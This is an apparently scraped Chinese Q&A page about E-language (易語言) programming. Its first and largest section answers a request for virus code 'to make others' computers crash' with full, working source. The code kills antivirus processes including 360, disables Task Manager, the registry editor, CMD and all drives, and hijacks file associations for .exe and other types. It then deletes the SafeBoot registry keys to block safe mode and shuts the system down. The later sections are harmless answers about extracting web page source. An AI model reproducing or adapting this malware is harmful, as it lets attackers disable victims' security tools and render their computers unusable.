導航:首頁 > 源碼編譯 > 易語言勒索源碼

易語言勒索源碼

發布時間:2023-06-05 21:32:11

㈠ 求易語言病毒源碼,最好能讓別人死機的源碼,急求,高分

.版本 2
.支持庫 shell
.程序集 窗口程序集1
.子程序 _按鈕1_被單擊
' 繞過殺毒軟體防禦:
運行 (「taskkill /f /im kavsvc.exe」, 假, 1)
運行 (「taskkill /f /im KVXP.kxp」, 假, 1)
運行 (「taskkill /f /im Rav.exe」, 假, 1)
運行 (「taskkill /f /im Ravmon.exe」, 假, 1)
運行 (「taskkill /f /im Mcshield.exe」, 假, 1)
運行 (「taskkill /f /im VsTskMgr.exe」, 假, 1)
' 修改系統時間:
置現行時間 (到時間 (「8888年8月8日」))
' 禁用任務管理器:
寫注冊項 (3, 「Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr」, 0)
' 禁用注冊表:
寫注冊項 (3, 「Software\Microsoft\Windows\CurrentVersion\Policies\System\Disableregistrytools」, 1)
' 隱藏開始中的運行 禁止WIN2000/XP通過任務管理器創建新任務:
寫注冊項 (3, 「Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun」, 1)
' 隱藏「MS-DOS方式」下的磁碟驅動器。不管是在「我的電腦」里,或「MS-DOS」方式下都看不見了:
寫注冊項 (3, 「SoftWare \Microsoft \Windows \CurrentVersion \Policies\WinOldApp\Disabled」, 1)
' 隱藏開始中的關機:
寫注冊項 (3, 「Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoClose」, 1)
' 隱藏開始中的搜索:
寫注冊項 (3, 「Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind」, 1)
' OVER360防禦:
寫注冊項 (4, 「SOFTWARE\360Safe\safemon\ExecAccess」, 0)
寫注冊項 (4, 「SOFTWARE\360Safe\safemon\MonAccess」, 0)
寫注冊項 (4, 「SOFTWARE\360Safe\safemon\SiteAccess」, 0)
寫注冊項 (4, 「SOFTWARE\360Safe\safemon\UDiskAccess」, 0)
' 結束360進程
運行 (「taskkill /f /im 360tray.exe」, 假, 1)
' 隱藏所有驅動器:
寫注冊項 (3, 「Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDrives」, 4294967295)
' 禁止所有驅動器:
寫注冊項 (3, 「Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewOnDrive」, 4294967295)
' 隱藏文件夾選項:
寫注冊項 (3, 「Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions」, 1)
' 將桌面對象隱藏:
寫注冊項 (3, 「Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDesktop」, 1)
' 隱藏開始中的關機:
寫注冊項 (3, 「Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoClose」, 1)
' 隱藏開始中的搜索:
寫注冊項 (3, 「Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind」, 1)
' 這條有兩種情況。1 禁用CMD和.BAT文件 2 禁CMD不禁.BAT 0啟用兩項
寫注冊項 (3, 「Software\Policies\Microsoft\Windows\System\DisableCMD」, 1)
' 隱藏主頁選項組:
寫注冊項 (3, 「Software\Policies\Microsoft\Internet Explorer\Control Panel\HomePage」, 1)
' 隱藏IE文件菜單:
寫注冊項 (3, 「Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFileMenu」, 1)
' 隱藏收藏夾菜單:
寫注冊項 (3, 「Software\Policies\Microsoft\Internet Explorer\Restrictions\NoFavorites」, 1)
' 禁用IE列印功能:
寫注冊項 (3, 「Software\Policies\Microsoft\Internet Explorer\Restrictions\NoPrinting」, 1)
' 隱藏Internet選項:
寫注冊項 (3, 「Software\Policies\Microsoft\Internet Explorer\Restrictions\NoBrowserOptions」, 1)
' 禁止IE查看源文件:
寫注冊項 (3, 「Software\Policies\Microsoft\Internet Explorer\Restrictions\NoViewSource」, 1)
' 禁用IE下載功能:
寫注冊項 (3, 「Software\Microsoft\Windows\CurrentVersion\Interner Settings\Zones\3\1803」, 3)
' 禁止右鍵關聯菜單:
寫注冊項 (3, 「Software\Policies\Microsoft\Internet Explorer\Restrictions\NoBrowserContextMenu」, 1)
' 修改文件關聯:
寫注冊項 (1, 「.txt\」, 「jpegfile」)
寫注冊項 (1, 「.inf\」, 「jpegfile」)
寫注冊項 (1, 「.reg\」, 「jpegfile」)
寫注冊項 (1, 「.exe\」, 「jpegfile」)
' 無法進入安全模式:
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{36FC9E60-C465-11CF-8056-444553540000}\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E965-E325-11CE-BFC1-08002BE10318}\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318}\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E969-E325-11CE-BFC1-08002BE10318}\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E96A-E325-11CE-BFC1-08002BE10318}\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E96B-E325-11CE-BFC1-08002BE10318}\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E96F-E325-11CE-BFC1-08002BE10318}\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E972-E325-11CE-BFC1-08002BE10318}\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E973-E325-11CE-BFC1-08002BE10318}\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E974-E325-11CE-BFC1-08002BE10318}\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E975-E325-11CE-BFC1-08002BE10318}\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E977-E325-11CE-BFC1-08002BE10318}\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E97B-E325-11CE-BFC1-08002BE10318}\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E97D-E325-11CE-BFC1-08002BE10318}\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E980-E325-11CE-BFC1-08002BE10318}\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{71A27CDD-812A-11D0-BEC7-08002BE2092F}\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{745A17A0-74D3-11D0-B6FE-00A0C90F57DA}\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\AFD\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\AppMgmt\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Base\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Boot Bus Extender\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Boot file system\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Browser\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\CryptSvc\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\DcomLaunch\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Dhcp\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\dmadmin\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\dmboot.sys\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\dmio.sys\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\dmload.sys\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\dmserver\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\DnsCache\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\EventLog\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\File system\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Filter\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\HelpSvc\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\ip6fw.sys\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\ipnat.sys\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\LanmanServer\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\LanmanWorkstation\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\LmHosts\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Messenger\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\NDIS\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\NDIS Wrapper\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Ndisuio\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\NetBIOS\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\NetBIOSGroup\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\NetBT\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\NetDDEGroup\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Netlogon\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\NetMan\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Network\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\NetworkProvider\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\NtLmSsp\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\PCI Configuration\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\PlugPlay\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\PNP Filter\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\PNP_TDI\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Primary disk\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\rdpcdd.sys\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\rdpdd.sys\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\rdpwd.sys\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\rdsessmgr\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\RpcSs\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\SCSI Class\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\sermouse.sys\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\SharedAccess\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\sr.sys\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\SRService\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Streams Drivers\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\System Bus Extender\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Tcpip\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\TDI\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\tdpipe.sys\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\tdtcp.sys\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\termservice\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\vga.sys\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\vgasave.sys\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\WinMgmt\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\WZCSVC\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Ndisuio\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\」)
' 關機:
關閉系統 (2, 真)

㈡ 易語言:如何取得網頁源碼中需要的內容

用取文本中間就行了,給你一個我最初學時編寫的一個程序和你想要的類似,希望對你有所幫助

伺服器地址分析.e" wealth="0" />

㈢ 易語言源碼是什麼

就是 文件名.e的文件 用這個文件 可以修改程序的功能 界面等 把它改寫成你自己的程序 如果你想學習易語言推薦去赤血學院 學習一下 哪裡成套的視頻教程 可以讓你快速入門。

㈣ 易語言怎麼取網頁源碼

問題一:易語言如何獲取網頁源碼的並展示出來? .版本 2
.支持庫 RegEx
.支持庫 internet
.支持庫 iext
.子程序 _按鈕1_被單擊
.局部變數 網頁文本, 文本型
.局部變數 表達式, 正則表達式
.局部變數 搜索結果, 搜索結果, , 0
.局部變數 計次變數, 整數型
.局部變數 文本, 文本型
網頁文本 = 到文本 (HTTP讀文件 (編輯框1.內容))
網頁文本 = 子文本替換 (網頁文本, #引號, 「'」, 0, , 真)
網頁文本 = 到小寫 (網頁文本)
透明標簽1.標題 = 取中間文 (網頁文本, 「」, 「」)
表達式.創建 (「meta (.*?)>」, 假)
搜索結果 = 表達式.搜索全部 (網頁文本)
.計次循環首 (取數組成員數 (搜索結果), 計次變數)
文本 = 搜索結果 [計次變數].取子匹配文本 (網頁文本, 1, )
.判斷開始 (尋找文本 (文本, 「name='keywords'」, 1, 假) > 0)
透明標簽2.標題 = 取中間文 (文本, 「content='」, 「'」)
.判斷 (尋找文本 (文本, 「name='description'」, 1, 假) > 0)
透明標簽3.標題 = 取中間文 (文本, 「content='」, 「'」)
.默認
.判斷結束
.計次循環尾 ()
.子程序 取中間文, 文本型
.參數 全文, 文本型
.參數 左文, 文本型
.參數 右文, 文本型
.局部變數 位置, 整數型
.局部變數 總長度, 整數型
.局部變數 文本, 文本型
總長度 = 取文本長度 (全文)
位置 = 尋找文本 (全文, 左文, , 假)
.如果真 (位置 < 0)
返回 (「」)
.如果真結束
位置 = 位置 + 取文本長度 (左文)
文本 = 取文本中間 (全文, 位置, 總長度)
總長度 = 取文本長度 (文本)
位置 = 尋找文本 (文本, 右文, , 假) - 1
.如果真 (位置 < 0)
返回 (「」)
.如果真結束
文本 = 取文本中間 (文本, 1, 位置)
返回 (文本)

問題二:易語言怎麼獲取網頁源代碼 我記得我給你回答過了,其實說老實話,想學好一門編程語言,不下大功夫是不行的,網上有很多開源的,我不能幫你太多,因為我對這方面不是很懂,呵呵,不好意思。

問題三:易語言取網頁源碼的問題,求解答! 思路:
超文本瀏覽框.取文檔對象 ().對象型方法 (「getElementById」, 「xxx」).方法 (「focus」, )
超文本瀏覽框.取文檔對象 ().對象型方法 (「getElementById」, 「xxx」).方法 (「click」, )
取這個選擇框的對象(XXX是對象名稱或者ID),然後讓其獲得焦點並單擊它
就可以再取
臨時文本 = 超文本瀏覽框.取文檔對象 ().讀對象型屬性 (「body」, ).讀文本屬性 (「outerText」, )
此時的臨時文本就是網頁的源碼如果你要HTML格式的就用「讀文本屬性 (「outerhtml」, )」

問題四:易語言怎麼取網頁代碼中的一段代碼! 20分 高級答案:
首先創建子程序---取中間文件內容---------------------------------------------------------------------
.版本 2
.子程序 取文本中間內容, 文本型, 公開
.參數 需取文本, 文本型
.參數 左邊內容, 文本型
.參數 右邊內容, 文本型
.參數 成功與否, 邏輯型, 參考 可空
.局部變數 長度, 整數型
.局部變數 左邊位置, 整數型
.局部變數 左邊長度, 整數型
.局部變數 右邊位置, 整數型
.局部變數 右邊長度, 整數型
長度 = 取文本長度 (需取文本)
左邊位置 = 尋找文本 (需取文本, 左邊內容, 0, 假)
左邊長度 = 取文本長度 (左邊內容)
.如果真 (左邊位置 = -1)
成功與否 = 假
返回 (「未找到左邊內容」)
.如果真結束
右邊位置 = 尋找文本 (需取文本, 右邊內容, 0, 假)
右邊長度 = 取文本長度 (右邊內容)
.如果真 (右邊位置 = -1)
成功與否 = 假
返回 (「未找到右邊內容」)
.如果真結束
成功與否 = 真
返回 (取文本中間 (需取文本, 左邊位置 + 左邊長度, 長度 - (左邊位置 + 左邊長度) - (長度 - 右邊位置)))
--------------------創建完畢-------------------------廠------------------------------------------------------------
新建個編輯框1.然後在建個按鈕,在按鈕里輸入代碼
編輯框1.內容=取文本中間內容 (zxcvbnm123456789asfhyf, zxcvbnm, asfhyf)
點擊這個按鈕,編輯框1的內容就是123456789
圖片概要:

問題五:易語言 取網頁源碼 可以實時獲取超文本瀏覽框里的源碼,和 查看源代碼一樣。

問題六:易語言這個取網頁源碼如何取文本中間?有圖 到整數刪除了就可以了

問題七:易語言 如何讀取網頁源文件的代碼! .版本 2
.支持庫 internet
.子程序 __啟動窗口_創建完畢
_啟動窗口.標題 = 到文本 (HTTP讀文件 (「你要打開的t攻t地址。txt」))

問題八:求易語言多線程提取網頁源碼的例子 這是一個最簡單的多線程網頁訪問保存網頁的程序,如果滿意採納哦

問題九:易語言取網頁源碼中的元素內容,應該關於精易模塊 80分 你要的只是取這個 span 里的內容嗎?
用了精易模塊的話
你可以用 文本_取出中間文本() 命令來獲取,命令格式如下:
文本_取出中間文本(原文本,目標文本左邊,目標文本右邊)
原文本這里就可以是你讀取出來的網頁源碼
目標文本左邊,在你的圖片里,就可以是
目標文本右邊,在你的圖片里,就是

問題十:易語言取網頁指定內容源碼 要方便快捷的話,就用精易模塊裡面的取出中間文本(),不想用模塊的話就用分割文本。建議你用精易模塊的文本_取中間文本()

閱讀全文

與易語言勒索源碼相關的資料

熱點內容
手機連接加密的wifi密碼 瀏覽:627
ubuntu系統解壓好慢 瀏覽:631
python編輯圓弧形文字 瀏覽:577
歐卡怎麼看伺服器 瀏覽:995
研究運動型app用什麼模型 瀏覽:951
蘇寧手機app什麼意思 瀏覽:494
貸款還完在哪個車管所可以辦解壓 瀏覽:512
phpopenofficepdf 瀏覽:512
重啟應用伺服器怎麼重啟 瀏覽:295
ios什麼app看小說 瀏覽:786
gif壓縮神器 瀏覽:674
如何用聯網的微機進伺服器 瀏覽:573
1s命令 瀏覽:6
畫圖app有什麼用 瀏覽:378
什麼是人工智慧的演算法 瀏覽:890
安卓手機怎麼設置每天發簡訊 瀏覽:24
有什麼海鮮魚干app 瀏覽:834
接收的文件下載後解壓 瀏覽:260
java演算法都有什麼 瀏覽:640
傳智播客php面試寶典 瀏覽:939